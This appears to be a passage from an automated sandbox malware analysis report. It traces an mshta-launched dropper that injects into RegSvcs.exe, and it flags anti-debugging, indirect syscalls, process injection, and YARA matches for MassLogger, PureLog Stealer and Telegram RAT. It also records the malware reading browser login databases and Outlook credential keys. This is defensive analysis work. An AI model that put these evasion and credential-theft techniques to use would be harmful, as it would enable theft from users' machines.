                  Source: mshta.exe, 00000000.00000003.1683026110.0000000008EE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1682380866.0000000008ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1685087255.0000000008F23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FrvI2pMfM@P1PsRKvGGobTa?hNwj&&fUa1vIL1qu70&&R/8/1lF4Q9SPzLkmP7ooR6RMQGYi6!!FBGf?nDNcSRNUFg6&&5/1mRHGfs9Ih&&9q5Zh2hjCoK7ztMw?sEl+6@l+zLcdkts6kssknQF9@?9Ijebd4?TgFQnQRFtBvj
                  Source: mshta.exe, 00000000.00000003.1708716715.0000000005FE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jY6RTpqOqw6/ToHOyk7RDtdO247fDuGO4w7oDusO8470zvuO/M7FTwyPDg8QjxYPGs8gTyKP&&Y8oTzIPPk8ET0/PUQ9aT1+PYQ9jj2UPaQ9rD2yPcE9yz3RPe@96j3wPQI+FD4vPjU+UD5gPmk+cT6&&Ppw+oj6oPq8+uD69PsM+yz7QPtY+3j7jPuk+8T72Pvw+BD8&&Pw8/Fz8cPyI/Kj8vPzU/PT9CP0g/UD9!!P1s/Yz9oP24/dj97P4E/iT+OP5Q/nD+hP6c/rz+0P7o/wj/HP8w/1T/aP+@/6D/tP/M/+z8@o@I@+@@@@@@wBj@OMBMwGT@hMCYwLD@0MDkwPzBHMEwwUjBaMF8wZTBtMHIweDC@MIUwizCTM&&gwnjCmMKswsTC5ML4wxDDMMNEw1zDfMOQw6jDyMPcw/D@FMQoxEDEYMR4xLDE6MUgxTzFcM?UxhjGvMcIx0jERMikyMz&&PMlYy
                  Source: snmptrap.exe, 0000001D.00000002.2920979145.00000000004D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUUP
                  Source: x.exe, 00000001.00000002.1738442951.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1738442951.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1933405508.000000000067B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1764243449.000000000067B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: mshta.exe, 00000000.00000003.1708549207.0000000005FB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qNe81/jUsNlc2jjbENtc2ZzebN8I3DTg8OEQ4xDjxOCk5MTl6OZQ5yDnOOfc5EjoqOjY6RTpqOqw6/ToHOyk7RDtdO247fDuGO4w7oDusO8470zvuO/M7FTwyPDg8QjxYPGs8gTyKP&&Y8oTzIPPk8ET0/PUQ9aT1+PYQ9jj2UPaQ9rD2yPcE9yz3RPe@96j3wPQI+FD4vPjU+UD5gPmk+cT6&&Ppw+oj6oPq8+uD69PsM+yz7QPtY+3j7jPuk+8T72Pvw+BD8&&Pw8/Fz8cPyI/Kj8vPzU/PT9CP0g/UD9!!P1s/Yz9oP24/dj97P4E/iT+OP5Q/nD+hP6c/rz+0P7o/wj/HP8w/1T/aP+@/6D/tP/M/+z8@o@I@+@@@@@@wBj@OMBMwGT@hMCYwLD@0MDkwPzBHMEwwUjBaMF8wZTBtMHIweDC@MIUwizCTM&&gwnjCmMKswsTC5ML4wxDDMMNEw1zDfMOQw6jDyMPcw/D@FMQoxEDEYMR4xLDE6MUgxTzFcM?UxhjGvMcIx0jERMikyMz&&PMlYy
                  Source: mshta.exe, 00000000.00000003.1701795560.0000000005487000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1706859503.0000000005489000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FrvI2pMfM@P1PsRKvGGobTa?hNwj&&fUa1vIL1qu70&&R/8/1lF4Q9SPzLkmP7ooR6RMQGYi6!!FBGf?nDNcSRNUFg6&&5/1mRHGfs9Ih&&9q5Zh2hjCoK7ztMw?sEl+6@l+zLcdkts6kssknQF9@?9Ijebd4?TgFQnQRFtBv
                  Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_1-108553
                  Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_1-108891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04EAF510 LdrInitializeThunk,5_2_04EAF510
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00473F09 BlockInput,1_2_00473F09
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00403B3A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00435A7C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00404B37 LoadLibraryA,GetProcAddress,1_2_00404B37
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0055C594 mov eax, dword ptr fs:[00000030h]1_2_0055C594
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A71130 mov eax, dword ptr fs:[00000030h]1_2_00A71130
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AB3F3D mov eax, dword ptr fs:[00000030h]1_2_00AB3F3D
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00BF94E0 mov eax, dword ptr fs:[00000030h]1_2_00BF94E0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00BF9540 mov eax, dword ptr fs:[00000030h]1_2_00BF9540
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00BF7EC0 mov eax, dword ptr fs:[00000030h]1_2_00BF7EC0
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009B1130 mov eax, dword ptr fs:[00000030h]4_2_009B1130
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009F3F3D mov eax, dword ptr fs:[00000030h]4_2_009F3F3D
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_00A86868 mov eax, dword ptr fs:[00000030h]4_2_00A86868
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_00A87E88 mov eax, dword ptr fs:[00000030h]4_2_00A87E88
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_00A87EE8 mov eax, dword ptr fs:[00000030h]4_2_00A87EE8
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A51130 mov eax, dword ptr fs:[00000030h]10_2_00A51130
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A93F3D mov eax, dword ptr fs:[00000030h]10_2_00A93F3D
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00D36CC8 mov eax, dword ptr fs:[00000030h]10_2_00D36CC8
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00D382E8 mov eax, dword ptr fs:[00000030h]10_2_00D382E8
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00D38348 mov eax, dword ptr fs:[00000030h]10_2_00D38348
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B41130 mov eax, dword ptr fs:[00000030h]12_2_00B41130
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B83F3D mov eax, dword ptr fs:[00000030h]12_2_00B83F3D
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00CE84B0 mov eax, dword ptr fs:[00000030h]12_2_00CE84B0
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00CE8510 mov eax, dword ptr fs:[00000030h]12_2_00CE8510
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00CE6E90 mov eax, dword ptr fs:[00000030h]12_2_00CE6E90
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,1_2_004580A9
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0042A155
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042A124 SetUnhandledExceptionFilter,1_2_0042A124
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AB1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00AB1361
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AB4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00AB4C7B
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009F1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_009F1361
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009F4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_009F4C7B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00416F6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004123F1 SetUnhandledExceptionFilter,5_2_004123F1
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A91361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00A91361
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A94C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00A94C7B
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B81361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00B81361
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B84C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00B84C7B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 705008Jump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AF1008
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004587B1 LogonUserW,1_2_004587B1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00403B3A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_004048D7
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00464C53 mouse_event,1_2_00464C53
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00457CAF
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_0045874B
                  Source: x.exe, 00000001.00000003.1735418066.0000000004153000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: x.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042862B cpuid 1_2_0042862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,5_2_00417A20
                  Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST8827.tmp VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST8838.tmp VolumeInformation
                  Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00434E87
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00441E06 GetUserNameW,1_2_00441E06
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00433F3A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_004049A0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
